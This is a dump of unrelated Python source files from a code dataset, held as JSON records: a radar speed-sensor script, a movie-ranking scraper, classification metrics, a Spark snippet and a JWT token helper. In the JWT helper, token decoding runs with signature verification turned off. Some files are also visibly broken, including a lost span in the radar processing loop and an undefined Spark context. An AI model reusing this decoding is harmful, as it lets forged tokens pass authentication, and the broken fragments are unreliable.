get_sensor_config()\n write_configs(sensor_config)\n \n processing_config = get_processing_config()\n sensor_config.sensor = args.sensors\n\n session_info = client.setup_session(sensor_config)\n\n pg_updater = PGUpdater(sensor_config, processing_config, session_info)\n pg_process = et.PGProcess(pg_updater)\n pg_process.start()\n\n client.start_session()\n\n interrupt_handler = et.utils.ExampleInterruptHandler()\n print(\"Press Ctrl-C to end session\")\n\n processor = Processor(sensor_config, processing_config, session_info)\n\n dataPoint_v_arr = []\n \n while not interrupt_handler.got_signal:\n info, data = client.get_next()\n \n plot_data = processor.process(data, info)\n #vel_history är en lista över de senast uppmätta hastigheterna\n #vel är endast maxhastigheten från de senast uppmätta hastigheterna\n # vel = output_vel = np.nanmax(self.est_vel_history) (Processor.process)\n \n history = plot_data[\"vel_history\"]\n for i in history:\n \n if 
np.isnan(i):\n i = 0\n dataPoint_v_arr.append([i]) \n \n \n if plot_data is not None:\n try:\n pg_process.put_data(plot_data)\n except et.PGProccessDiedException:\n break\n \n\n \n print(\"\\n Disconnecting...\")\n print(\"Goodbye!\")\n pg_process.close()\n client.disconnect()\n \n \n write_velocity(dataPoint_v_arr)\n\ndef get_sensor_config():\n config = et.configs.SparseServiceConfig()\n config.profile = et.configs.SparseServiceConfig.Profile.PROFILE_5\n config.sampling_mode = et.configs.SparseServiceConfig.SamplingMode.A\n config.range_interval = [0.7, 1]\n config.downsampling_factor = 3\n config.sweeps_per_frame = 512\n config.hw_accelerated_average_samples = 30\n # Frame update rate? \n return config\n\ndef write_velocity(vels):\n # TODO - change name to speed!\n \n with open('velocity_values.csv', 'w', newline = '') as csvfile:\n my_writer = csv.writer(csvfile)\n my_writer.writerows(vels)\n \n\ndef write_configs(conf):\n \n\n # Sensor config\n config_data = [\n \n ['Profile', conf.profile],\n ['Range Interval', str(conf.range_interval[0]) + \"-\" + str(conf.range_interval[1])],\n ['Sweeps per frame', conf.sweeps_per_frame],\n ['Accelerated average samples', conf.hw_accelerated_average_samples]\n ]\n\n with open('sensor_conf.csv', 'w', newline = '') as csvfile:\n my_writer = csv.writer(csvfile)\n my_writer.writerows(config_data)\n \n\nclass ProcessingConfiguration(et.configbase.ProcessingConfig):\n VERSION = 6\n\n class SpeedUnit(Enum):\n METER_PER_SECOND = (\"m/s\", 1)\n KILOMETERS_PER_HOUR = (\"km/h\", 3.6)\n MILES_PER_HOUR = (\"mph\", 2.237)\n\n @property\n def label(self):\n return self.value[0]\n\n @property\n def scale(self):\n return self.value[1]\n\n class ProcessingMethod(Enum):\n WELCH = \"Welch\"\n BARTLETT = \"Bartlett\"\n\n threshold = et.configbase.FloatParameter(\n label=\"Threshold\",\n default_value=4.0,\n limits=(1, 100),\n decimals=2,\n updateable=True,\n logscale=True,\n order=0,\n )\n\n min_speed = et.configbase.FloatParameter(\n label=\"Minimum speed\",\n unit=\"m/s\",\n default_value=0.5,\n limits=(0, 5),\n decimals=1,\n updateable=True,\n order=10,\n )\n\n fft_oversampling_factor = et.configbase.IntParameter(\n label=\"FFT oversampling factor\",\n default_value=1,\n valid_values=[1, 2, 4, 8],\n updateable=False,\n order=11,\n )\n\n processing_method = et.configbase.EnumParameter(\n label=\"Processing method\",\n default_value=ProcessingMethod.WELCH,\n enum=ProcessingMethod,\n updateable=False,\n help=(\n \"In Welch's method the segments overlap 50% and the periodograms are \"\n \"windowed using a Hann window.\"\n \"\\nIn Bartlett's method there is no overlap between segments \"\n \"and the periodograms are not modified.\"\n \"\\nWelch's method will result in lower variance and added complexity\"\n \"compared to Bartlett's method.\"\n ),\n order=12,\n )\n\n num_segments = et.configbase.IntParameter(\n label=\"Number of segments\",\n default_value=3,\n limits=(1, None),\n updateable=False,\n help=(\n \"Number of segments determines how many segments \"\n \"the signal will be divided into when using Welch's/Bartlett's method.\"\n ),\n order=13,\n )\n\n shown_speed_unit = et.configbase.EnumParameter(\n label=\"Speed unit\",\n default_value=SpeedUnit.MILES_PER_HOUR,\n enum=SpeedUnit,\n updateable=True,\n order=100,\n )\n\n show_data_plot = et.configbase.BoolParameter(\n label=\"Show data\",\n default_value=False,\n updateable=True,\n order=110,\n )\n\n show_sd_plot = et.configbase.BoolParameter(\n label=\"Show spectral density\",\n default_value=True,\n 
updateable=True,\n order=120,\n )\n\n show_vel_history_plot = et.configbase.BoolParameter(\n label=\"Show speed history\",\n default_value=True,\n updateable=True,\n order=130,\n )\n\n num_shown_sequences = et.configbase.IntParameter(\n label=\"Number of history bars\",\n default_value=10,\n limits=(1, NUM_SAVED_SEQUENCES),\n updateable=True,\n order=150,\n )\n\n def check(self):\n alerts = []\n\n if self.processing_method == self.ProcessingMethod.WELCH and self.num_segments % 2 != 1:\n alerts.append(et.configbase.Error(\"num_segments\", \"Number of segments must be odd\"))\n\n if self.processing_method == self.ProcessingMethod.BARTLETT and self.num_segments % 2 != 0:\n alerts.append(et.configbase.Error(\"num_segments\", \"Number of segments must be even\"))\n\n return alerts\n\n def check_sensor_config(self, sensor_config):\n alerts = {\n \"processing\": [],\n \"sensor\": [],\n }\n\n if self.processing_method == ProcessingConfiguration.ProcessingMethod.WELCH:\n # Overlap is 50% of the segment size\n segment_length = 2 * sensor_config.sweeps_per_frame // (self.num_segments + 1)\n else:\n segment_length = sensor_config.sweeps_per_frame // self.num_segments\n\n if 0 <= segment_length < 8:\n alerts[\"processing\"].append(\n et.configbase.Error(\n \"num_segments\",\n (\n \"Number of points in segment is too small.\"\n \"\\nDecrease number of segments\"\n \"\\nor increase number of sweeps per frame\"\n ),\n )\n )\n\n if (sensor_config.sweeps_per_frame & (sensor_config.sweeps_per_frame - 1)) != 0:\n lower = 2 ** int(np.floor(np.log2(sensor_config.sweeps_per_frame)))\n upper = 2 ** int(np.ceil(np.log2(sensor_config.sweeps_per_frame)))\n alerts[\"sensor\"].append(\n et.configbase.Error(\n \"sweeps_per_frame\",\n (\n \"Must have a value that is a power of 2.\"\n \"\\nClosest values are {} and {}\".format(lower, upper)\n ),\n )\n )\n\n return alerts\n\n\nget_processing_config = ProcessingConfiguration\n\n\nclass Processor:\n def __init__(self, sensor_config, processing_config, session_info):\n self.sweeps_per_frame = sensor_config.sweeps_per_frame\n sweep_rate = session_info[\"sweep_rate\"]\n est_frame_rate = sweep_rate / self.sweeps_per_frame\n self.depths = et.utils.get_range_depths(sensor_config, session_info)\n\n if processing_config.processing_method == ProcessingConfiguration.ProcessingMethod.WELCH:\n segment_length = 2 * self.sweeps_per_frame // (processing_config.num_segments + 1)\n else:\n segment_length = self.sweeps_per_frame // processing_config.num_segments\n\n self.fft_length = segment_length * processing_config.fft_oversampling_factor\n self.num_noise_est_bins = 3\n noise_est_tc = 1.0\n\n self.sequence_timeout_count = int(round(est_frame_rate * SEQUENCE_TIMEOUT_LENGTH))\n est_vel_history_size = int(round(est_frame_rate * EST_VEL_HISTORY_LENGTH))\n sd_history_size = int(round(est_frame_rate * SD_HISTORY_LENGTH))\n self.noise_est_sf = self.tc_to_sf(noise_est_tc, est_frame_rate)\n self.bin_fs = np.fft.rfftfreq(self.fft_length) * sweep_rate\n self.bin_vs = self.bin_fs * HALF_WAVELENGTH\n\n num_bins = self.bin_fs.size\n self.nasd_history = np.zeros([sd_history_size, num_bins])\n self.est_vel_history = np.full(est_vel_history_size, np.nan)\n self.belongs_to_last_sequence = np.zeros(est_vel_history_size, dtype=bool)\n self.noise_est = 0\n self.current_sequence_idle = self.sequence_timeout_count + 1\n self.sequence_vels = np.zeros(NUM_SAVED_SEQUENCES)\n self.update_idx = 0\n\n self.num_segments = processing_config.num_segments\n self.processing_method = processing_config.processing_method\n\n 
self.update_processing_config(processing_config)\n\n def update_processing_config(self, processing_config):\n self.min_speed = processing_config.min_speed\n self.threshold = processing_config.threshold\n\n def tc_to_sf(self, tc, fs):\n if tc <= 0.0:\n return 0.0\n\n return np.exp(-1.0 / (tc * fs))\n\n def dynamic_sf(self, static_sf):\n return min(static_sf, 1.0 - 1.0 / (1.0 + self.update_idx))\n\n def process(self, data, data_info=None):\n if data_info is None:\n warnings.warn(\n \"To leave out data_info or set to None is deprecated\",\n DeprecationWarning,\n stacklevel=2,\n )\n\n frame = data\n\n # Basic speed estimate using Welch's method\n\n zero_mean_frame = frame - frame.mean(axis=0, keepdims=True)\n psd_length = self.fft_length // 2 + 1\n\n if self.processing_method == ProcessingConfiguration.ProcessingMethod.WELCH:\n # Overlap is 50% of the segment size\n segment_length = 2 * self.sweeps_per_frame // (self.num_segments + 1)\n else:\n segment_length = self.sweeps_per_frame // self.num_segments\n\n window = hann(segment_length, sym=False)\n window_norm = np.sum(window ** 2)\n\n fft_segments = np.empty((self.num_segments, psd_length, len(self.depths)))\n\n for i in range(self.num_segments):\n if self.processing_method == ProcessingConfiguration.ProcessingMethod.WELCH:\n offset_segment = i * segment_length // 2\n else:\n offset_segment = i * segment_length\n\n current_segment = zero_mean_frame[offset_segment : offset_segment + segment_length]\n\n if self.processing_method == ProcessingConfiguration.ProcessingMethod.WELCH:\n current_segment = current_segment * window[:, None]\n\n fft_segments[i] = (\n np.square(\n np.abs(\n np.fft.rfft(\n current_segment,\n self.fft_length,\n axis=0,\n )\n )\n )\n / window_norm\n ) # rfft automatically pads if n self.threshold\n est_idx = np.where(over)[0][-1] if np.any(over) else np.nan\n\n if est_idx > 0: # evaluates to false if nan\n est_vel = self.bin_vs[est_idx]\n else:\n est_vel = np.nan\n\n if est_vel < self.min_speed: # evaluates to false if nan\n est_vel = np.nan\n\n # Sequence\n\n self.belongs_to_last_sequence = np.roll(self.belongs_to_last_sequence, -1)\n\n if np.isnan(est_vel):\n self.current_sequence_idle += 1\n else:\n if self.current_sequence_idle > self.sequence_timeout_count:\n self.sequence_vels = np.roll(self.sequence_vels, -1)\n self.sequence_vels[-1] = est_vel\n self.belongs_to_last_sequence[:] = False\n\n self.current_sequence_idle = 0\n self.belongs_to_last_sequence[-1] = True\n\n if est_vel > self.sequence_vels[-1]:\n self.sequence_vels[-1] = est_vel\n\n # Data for plots\n\n self.est_vel_history = np.roll(self.est_vel_history, -1, axis=0)\n self.est_vel_history[-1] = est_vel\n\n if np.all(np.isnan(self.est_vel_history)):\n output_vel = None\n else:\n output_vel = np.nanmax(self.est_vel_history)\n\n self.nasd_history = np.roll(self.nasd_history, -1, axis=0)\n self.nasd_history[-1] = nasd\n\n nasd_temporal_max = np.max(self.nasd_history, axis=0)\n\n temporal_max_threshold = self.threshold \n\n self.update_idx += 1\n \n return {\n \"frame\": frame,\n \"nasd\": nasd,\n \"nasd_temporal_max\": nasd_temporal_max,\n \"temporal_max_threshold\": temporal_max_threshold,\n \"vel_history\": self.est_vel_history,\n \"vel\": output_vel,\n \"sequence_vels\": self.sequence_vels,\n \"belongs_to_last_sequence\": self.belongs_to_last_sequence,\n }\n\n\nclass PGUpdater:\n def __init__(self, sensor_config, processing_config, session_info):\n self.processing_config = processing_config\n\n self.sweeps_per_frame = sensor_config.sweeps_per_frame\n 
self.sweep_rate = session_info[\"sweep_rate\"]\n self.depths = et.utils.get_range_depths(sensor_config, session_info)\n self.num_depths = self.depths.size\n self.est_update_rate = self.sweep_rate / self.sweeps_per_frame\n\n self.num_shown_sequences = processing_config.num_shown_sequences\n\n if (\n self.processing_config.processing_method\n == ProcessingConfiguration.ProcessingMethod.WELCH\n ):\n segment_length = 2 * self.sweeps_per_frame // (processing_config.num_segments + 1)\n else:\n segment_length = self.sweeps_per_frame // processing_config.num_segments\n\n fft_length = segment_length * processing_config.fft_oversampling_factor\n self.bin_vs = np.fft.rfftfreq(fft_length) * self.sweep_rate * HALF_WAVELENGTH\n self.dt = 1.0 / self.est_update_rate\n\n self.setup_is_done = False\n\n def setup(self, win):\n # Data plots\n\n self.data_plots = []\n self.data_curves = []\n for i in range(self.num_depths):\n title = \"{:.0f} cm\".format(100 * self.depths[i])\n plot = win.addPlot(row=0, col=i, title=title)\n plot.setMenuEnabled(False)\n plot.setMouseEnabled(x=False, y=False)\n plot.hideButtons()\n plot.showGrid(x=True, y=True)\n plot.setYRange(0, 2 ** 16)\n plot.hideAxis(\"left\")\n plot.hideAxis(\"bottom\")\n plot.plot(np.arange(self.sweeps_per_frame), 2 ** 15 * np.ones(self.sweeps_per_frame))\n curve = plot.plot(pen=et.utils.pg_pen_cycler())\n self.data_plots.append(plot)\n self.data_curves.append(curve)\n\n # Spectral density plot\n\n self.sd_plot = win.addPlot(row=1, col=0, colspan=self.num_depths)\n self.sd_plot.setMenuEnabled(False)\n self.sd_plot.setMouseEnabled(x=False, y=False)\n self.sd_plot.hideButtons()\n self.sd_plot.setLabel(\"left\", \"Normalized PSD (dB)\")\n self.sd_plot.showGrid(x=True, y=True)\n self.sd_curve = self.sd_plot.plot(pen=et.utils.pg_pen_cycler())\n dashed_pen = pg.mkPen(\"k\", width=2, style=QtCore.Qt.DashLine)\n self.sd_threshold_line = pg.InfiniteLine(angle=0, pen=dashed_pen)\n self.sd_plot.addItem(self.sd_threshold_line)\n\n self.smooth_max = et.utils.SmoothMax(\n self.est_update_rate,\n tau_decay=0.5,\n tau_grow=0,\n hysteresis=0.2,\n )\n\n # Rolling speed plot\n\n self.vel_plot = pg.PlotItem()\n self.vel_plot.setMenuEnabled(False)\n self.vel_plot.setMouseEnabled(x=False, y=False)\n self.vel_plot.hideButtons()\n self.vel_plot.setLabel(\"bottom\", \"Time (s)\")\n self.vel_plot.showGrid(x=True, y=True)\n self.vel_plot.setXRange(-EST_VEL_HISTORY_LENGTH, 0)\n self.vel_max_line = pg.InfiniteLine(angle=0, pen=pg.mkPen(\"k\", width=1))\n self.vel_plot.addItem(self.vel_max_line)\n self.vel_scatter = pg.ScatterPlotItem(size=8)\n self.vel_plot.addItem(self.vel_scatter)\n\n self.vel_html_fmt = '{:.1f} {}'\n self.vel_text_item = pg.TextItem(anchor=(0.5, 0))\n self.vel_plot.addItem(self.vel_text_item)\n\n # Sequence speed plot\n\n self.sequences_plot = pg.PlotItem()\n self.sequences_plot.setMenuEnabled(False)\n self.sequences_plot.setMouseEnabled(x=False, y=False)\n self.sequences_plot.hideButtons()\n self.sequences_plot.setLabel(\"bottom\", \"History\")\n self.sequences_plot.showGrid(y=True)\n self.sequences_plot.setXRange(-self.num_shown_sequences + 0.5, 0.5)\n tmp = np.flip(np.arange(NUM_SAVED_SEQUENCES) == 0)\n brushes = [pg.mkBrush(et.utils.color_cycler(n)) for n in tmp]\n self.bar_graph = pg.BarGraphItem(\n x=np.arange(-NUM_SAVED_SEQUENCES, 0) + 1,\n height=np.zeros(NUM_SAVED_SEQUENCES),\n width=0.8,\n brushes=brushes,\n )\n self.sequences_plot.addItem(self.bar_graph)\n\n self.sequences_text_item = pg.TextItem(anchor=(0.5, 0))\n 
self.sequences_plot.addItem(self.sequences_text_item)\n\n sublayout = win.addLayout(row=2, col=0, colspan=self.num_depths)\n sublayout.addItem(self.vel_plot, col=0)\n sublayout.addItem(self.sequences_plot, col=1)\n\n self.setup_is_done = True\n self.update_processing_config()\n\n def update_processing_config(self, processing_config=None):\n if processing_config is None:\n processing_config = self.processing_config\n else:\n self.processing_config = processing_config\n\n if not self.setup_is_done:\n return\n\n for plot in self.data_plots:\n plot.setVisible(processing_config.show_data_plot)\n\n self.sd_plot.setVisible(processing_config.show_sd_plot)\n self.vel_plot.setVisible(processing_config.show_vel_history_plot)\n\n self.unit = processing_config.shown_speed_unit\n speed_label = \"Speed ({})\".format(self.unit.label)\n self.sd_plot.setLabel(\"bottom\", speed_label)\n self.vel_plot.setLabel(\"left\", speed_label)\n self.sequences_plot.setLabel(\"left\", speed_label)\n max_vel = self.bin_vs[-1] * self.unit.scale\n self.sd_plot.setXRange(0, max_vel)\n\n self.num_shown_sequences = processing_config.num_shown_sequences\n self.sequences_plot.setXRange(-self.num_shown_sequences + 0.5, 0.5)\n\n y_max = max_vel * 1.2\n self.vel_plot.setYRange(0, y_max)\n self.sequences_plot.setYRange(0, y_max)\n self.vel_text_item.setPos(-EST_VEL_HISTORY_LENGTH / 2, y_max)\n self.sequences_text_item.setPos(-self.num_shown_sequences / 2 + 0.5, y_max)\n\n def update(self, data):\n # Data plots\n\n for i, ys in enumerate(data[\"frame\"].T):\n self.data_curves[i].setData(ys)\n\n # Spectral density plot\n\n psd_db = 20 * np.log10(data[\"nasd_temporal_max\"])\n psd_threshold_db = 10 * np.log10(data[\"temporal_max_threshold\"]) \n m = self.smooth_max.update(max(2 * psd_threshold_db, np.max(psd_db)))\n self.sd_plot.setYRange(0, m)\n self.sd_curve.setData(self.bin_vs * self.unit.scale, psd_db)\n self.sd_threshold_line.setPos(psd_threshold_db)\n\n # Rolling speed plot\n\n vs = data[\"vel_history\"] * self.unit.scale\n mask = ~np.isnan(vs)\n ts = -np.flip(np.arange(vs.size)) * self.dt\n bs = data[\"belongs_to_last_sequence\"]\n brushes = [et.utils.pg_brush_cycler(int(b)) for b in bs[mask]]\n\n self.vel_scatter.setData(ts[mask], vs[mask], brush=brushes)\n\n v = data[\"vel\"]\n if v:\n html = self.vel_html_fmt.format(v * self.unit.scale, self.unit.label)\n self.vel_text_item.setHtml(html)\n self.vel_text_item.show()\n\n self.vel_max_line.setPos(v * self.unit.scale)\n self.vel_max_line.show()\n else:\n self.vel_text_item.hide()\n self.vel_max_line.hide()\n\n # Sequence speed plot\n\n hs = data[\"sequence_vels\"] * self.unit.scale\n self.bar_graph.setOpts(height=hs)\n\n if hs[-1] > 1e-3:\n html = self.vel_html_fmt.format(hs[-1], self.unit.label)\n self.sequences_text_item.setHtml(html)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Code_Draft.py","file_name":"Code_Draft.py","file_ext":"py","file_size_in_byte":22493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"152505688","text":"list_of_words = ['drill', 'waste', 'build', 'elbow', 'glove', 'sport', 'shock',\n 'cruel', 'black', 'state', 'grind', 'shake', 'donor', 'chaos',\n 'class', 'mouth', 'feign', 'heart', 'draft', 'giant', 'waist',\n 'abbey', 'acute', 'chief', 'horse', 'bowel', 'tough', 'cable',\n 'death', 'muggy', 'point', 'fever', 'front', 'chain', 'adopt',\n 'brand', 'steak', 'enjoy', 'swipe', 'blade', 'space', 'arrow',\n 'owner', 'stain', 'weave', 'force', 'blame', 'coach', 'jelly',\n 'pluck', 'small', 
'green', 'terms', 'upset', 'ideal', 'ivory',\n 'summit', 'dealer', 'string', 'pillow', 'couple', 'earwax', 'locate',\n 'assume', 'option', 'desire', 'decade', 'advice', 'senior', 'leader',\n 'timber', 'cheque', 'banner', 'treaty', 'credit', 'reduce', 'coffee',\n 'effort', 'belong', 'change', 'patent', 'monkey', 'survey', 'gravel',\n 'budget', 'system', 'embryo', 'charge', 'cheese', 'tender', 'mother',\n 'resign', 'prison', 'appeal', 'aspect', 'favour', 'freeze', 'button',\n 'bubble', 'jacket', 'square', 'thrust', 'lounge', 'runner', 'switch',\n 'gift', 'code', 'core', 'wire', 'loss', 'slab', 'slam', 'sell', 'bell',\n 'sofa', 'bite', 'miss', 'cane', 'pull', 'knee', 'post', 'iron', 'herd',\n 'cafe', 'blue', 'wage', 'step', 'date', 'stir', 'lily', 'mind', 'jump',\n 'bind', 'even', 'area', 'pass', 'dine', 'calm', 'food', 'deck', 'safe',\n 'pray', 'echo', 'vain', 'shed', 'rank', 'pair', 'cute', 'fool', 'beef',\n 'lean', 'swim', 'well', 'menu', 'tune', 'slot', 'plot', 'knot', 'yard']\n","sub_path":"PROJECT 2/words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"392859400","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 25 10:44:24 2020\n\n@author: nasmadasser\n\"\"\"\n\nimport numpy as np \nimport matplotlib.pyplot as plt\n\ndef confusion_matrix(true, predicted):\n # set the length of the matrix\n K = len(np.unique(true))+1\n # create empty matrix to fill\n matrix = np.zeros((K,K))\n \n # count labels \n for a, p in zip(true, predicted):\n matrix[a][p] +=1\n \n return matrix[1:K,1:K]\n\n\ndef plot_confusion_matrix(cm, title= 'Confusion matrix', cmap=plt.cm.winter_r):\n plt.figure(figsize=(15,15)) \n plt.matshow(cm, cmap=cmap) # imshow\n plt.colorbar()\n plt.xlabel('predicted room')\n plt.ylabel('actual room')\n plt.tight_layout()\n \n height, width = cm.shape\n for x in range (width):\n for y in range (height):\n plt.annotate(str(cm[x][y]), xy=(y,x), ha='center', va='center')\n plt.show()\n\ndef accuracy(true, predicted):\n return (true == predicted).sum()/float(len(true))\n\ndef precision(room, cm):\n # precision = TP / (TP+FP)\n column = cm[:,room]\n return cm[room,room]/column.sum()\n\ndef recall(room, cm):\n # recall = TP/ (FN+TP)\n row= cm[room,:]\n return cm[room,room]/row.sum()\n\ndef precision_total(cm):\n rows, columns = cm.shape\n precisions =0\n for room in range(rows):\n precisions +=precision(room, cm)\n return precisions/rows\n\ndef recall_total(cm):\n rows, columns = cm.shape\n recalls=0\n for room in range(columns):\n recalls += recall(room, cm)\n return recalls/columns\n\ndef cm_precision_recall_accuracy_F1(y_test, predicted, cm, by_room):\n precision =precision_total(cm)\n recall = recall_total(cm)\n accura = accuracy(y_test, predicted)\n F1 = 2*(precision*recall)/(precision+recall) \n if by_room is True:\n print('\\nPrediction by room \\n', \" Room Precision Recall\")\n for room in range(4):\n print(f\"{room:5d} {precision:9.3f} {recall:6.3f}\")\n \n print ('\\nTotal precision', \"{:.3%}\".format(precision))\n print ('Total recall', \"{:.3%}\".format(recall))\n print('Total accuracy',\"{:.3%}\".format(accura))\n print('F1 score',\"{:.3%}\".format(F1))\n \n return precision, recall, accura, F1\n \n","sub_path":"src/legacy/metrics_nasma.py","file_name":"metrics_nasma.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
+{"seq_id":"27068638","text":"import json\nimport sqlite3\nimport requests\nfrom multiprocessing import Pool\nfrom requests.exceptions import RequestException\nfrom bs4 import BeautifulSoup\n\nheaders = {\n 'Accept': '*/*',\n 'Accept-Encoding': 'gzip, deflate',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.1 Safari/605.1.15',\n 'Accept-Language': 'zh-cn'\n}\n\n\ndef create_table():\n conn = sqlite3.connect('maoyan.db')\n cursor = conn.cursor()\n try:\n cursor.execute('''create table if not exists top100\n (ranking integer ,\n image varchar(100),\n title varchar(100),\n actor varchar (100),\n time varchar (100),\n score float \n );\n ''')\n except sqlite3.OperationalError:\n return None\n cursor.close()\n conn.commit()\n conn.close()\n\n\ndef insert_to_top100(insert_data):\n conn = sqlite3.connect('maoyan.db')\n cursor = conn.cursor()\n try:\n cursor.execute('''\n insert into top100 \n (ranking, image, title, actor, time, score) \n values (?, ?, ?, ?, ?, ?)\n ''', (\n insert_data['ranking'],\n insert_data['image'],\n insert_data['title'],\n insert_data['actor'],\n insert_data['time'],\n insert_data['score']\n ))\n print(cursor.rowcount)\n except sqlite3.Error:\n return None\n cursor.close()\n conn.commit()\n conn.close()\n\n\ndef get_one_page(url):\n response = requests.get(url, headers=headers)\n try:\n if response.status_code == 200:\n return response.text\n return None\n except RequestException:\n return None\n\n\ndef parse_one_page(html):\n soup = BeautifulSoup(html, 'lxml')\n wrapper = soup.find('dl', class_='board-wrapper').find_all('dd')\n print(wrapper)\n for item in wrapper:\n yield {\n 'ranking': int(item.find('i', class_='board-index').string),\n 'image': item.find('img', class_='board-img')['data-src'],\n 'title': item.find('p', class_='name').string,\n 'actor': item.find('p', class_='star').string.strip()[3:],\n 'time': item.find('p', class_='releasetime').string.strip()[5:],\n 'score': float(item.find('p', class_='score').get_text())\n }\n\n\ndef write_to_file(content):\n with open('maoyan-top100.txt', 'a', encoding='utf-8') as file:\n file.write(json.dumps(content, ensure_ascii=False) + '\\n')\n\n\ndef main(offset):\n page_url = 'http://maoyan.com/board/4?offset=' + str(offset)\n print(page_url)\n html = get_one_page(page_url)\n for item in parse_one_page(html):\n print(item)\n write_to_file(item)\n insert_to_top100(item)\n\n\nif __name__ == '__main__':\n create_table()\n pool = Pool()\n pool.map(main, [i * 10 for i in range(10)])\n","sub_path":"maoyan-top100/maoyan-top100.py","file_name":"maoyan-top100.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"14242378","text":"# -*- coding: UTF-8 -*-\n'''\n@author: Andrewzhj\n@contact: andrew_zhj@126.com\n@file: ml-3.py\n@time: 2018/7/23 18:15\n@desc:\n@note:\n'''\nimport matplotlib\nfrom pyspark.sql import SparkSession\nspark = SparkSession\\\n .builder\\\n .appName(\"PythonWordCount\")\\\n .getOrCreate()\n\nuser_data = sc.textFile(\"/tmp/ml-100k/u.user\")\n# user_data=spark.read.text(\"/tmp/ml-100k/u.user\")\nuser_data.first()\nuser_fields = user_data.map(lambda line: line.split(\"|\"))\nnum_users = user_fields.map(lambda fields: fields[0]).count()\nnum_genders = user_fields.map(lambda fields: fields[2]).distinct().count()\nnum_occupations = user_fields.map(lambda fields: fields[3]).distinct().count()\nnum_zipcodes = user_fields.map(lambda fields: 
fields[4]).distinct().count()\n\nprint(\"Users: %d, Genders: %d, Occupations: %d, ZIP codes: %d\"\n %(num_users, num_genders, num_occupations, num_zipcodes))\n\n\nages = user_fields.map(lambda x: int(x[1])).collect()\nhist(ages, bins=20, color='lightblue', normal=True)\nfig = matplotlib.pyplot.gcf()\nfig.set_size_inches(16, 10)","sub_path":"spark-task/ml-3.py","file_name":"ml-3.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268446547","text":"gl_num = 10\ngl_title = \"黑骏马\"\ngl_name = \"小名\"\ndef demo():\n\n # num = 99\n print(\"%d\" % gl_num)\n print(\"%s\" % gl_title)\n print(\"%s\" % gl_name)\n\n# title = \"黑骏马\"\n\ndemo()\n# name = \"小名\"","sub_path":"视频学习/基础班/07_语法进阶/hm_07_全局变量命名.py","file_name":"hm_07_全局变量命名.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"7803849","text":"import jwt\nimport datetime\nfrom ns_portal.database.main_db import (\n TInstance,\n TApplications,\n TAutorisations,\n TUsers,\n TRoles,\n TSite\n)\nfrom ns_portal.utils.utils import (\n my_get_authentication_policy\n)\n\n# we follow the RFC7519\n# look at https://tools.ietf.org/html/rfc7519#section-4.1\n# for all definitions\n_seconde = 1\n_minuteInSec = 60 * _seconde\n_hoursInSec = 60 * _minuteInSec\n\n_cookieTokenExpInSec = 24 * _hoursInSec\n_codeTokenExpInSec = 5\n_accessTokenExpInSec = 5 * _minuteInSec\n_refreshTokenExpInSec = 24 * _hoursInSec\n\n\ndef myEncode(payload, secret, algorithm):\n return jwt.encode(payload, secret, algorithm=algorithm)\n\n\ndef myDecode(token, secret):\n payloadValided = False\n try:\n payloadValided = jwt.decode(\n token,\n secret,\n algorithms=['HS256', 'HS512'],\n verify=False\n )\n except jwt.ExpiredSignatureError:\n raise jwt.ExpiredSignatureError(\n 'You take too much time for getting your token.',\n 'You need to login again'\n )\n except jwt.InvalidTokenError:\n raise jwt.InvalidTokenError(\n 'Exception when decode()'\n )\n except jwt.DecodeError:\n raise jwt.DecodeError(\n 'We canno\\'t decode your token'\n )\n except jwt.InvalidSignatureError:\n raise jwt.InvalidSignatureError(\n 'Your token’s signature doesn’t match'\n ' the one provided as part of the token'\n )\n return payloadValided\n\n\ndef getSecretAndAlgorithFromPolicy(request, tokenKey, algoKey):\n policy = my_get_authentication_policy(request)\n secret = getattr(policy, tokenKey)\n algorithm = getattr(policy, algoKey)\n\n return (secret, algorithm)\n\n\ndef getCookieToken(idUser, request):\n secret, algorithm = getSecretAndAlgorithFromPolicy(\n request=request,\n tokenKey='cookieTokenSecret',\n algoKey='cookieTokenAlgorithm'\n )\n\n payload = buildPayload(\n idUser=idUser,\n request=request,\n timeAddForExp=_cookieTokenExpInSec\n )\n\n return myEncode(payload, secret, algorithm)\n\n\ndef getCodeToken(idUser, request):\n secret, algorithm = getSecretAndAlgorithFromPolicy(\n request=request,\n tokenKey='codeTokenSecret',\n algoKey='codeTokenAlgorithm'\n )\n\n now = datetime.datetime.now()\n nowInTimeStampSeconds = int(now.timestamp())\n\n payload = {\n 'sub': str(idUser),\n 'exp': nowInTimeStampSeconds + _codeTokenExpInSec\n }\n\n return myEncode(payload, secret, algorithm=algorithm)\n\n\ndef buildPayload(idUser, request, timeAddForExp):\n policy = my_get_authentication_policy(request)\n tsiteName = getattr(policy, 'TSit_Name')\n\n colsToRet = [\n TInstance.TIns_PK_ID,\n TInstance.TIns_Label,\n 
